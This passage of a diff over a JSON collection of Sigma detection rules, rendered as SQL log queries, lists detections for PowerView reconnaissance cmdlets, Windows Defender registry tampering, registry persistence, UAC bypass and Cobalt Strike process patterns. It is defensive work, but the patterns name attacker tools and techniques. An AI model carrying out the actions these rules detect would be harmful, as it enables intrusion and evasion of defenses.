LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", - "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "status": "experimental", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "status": "experimental", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", - "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE 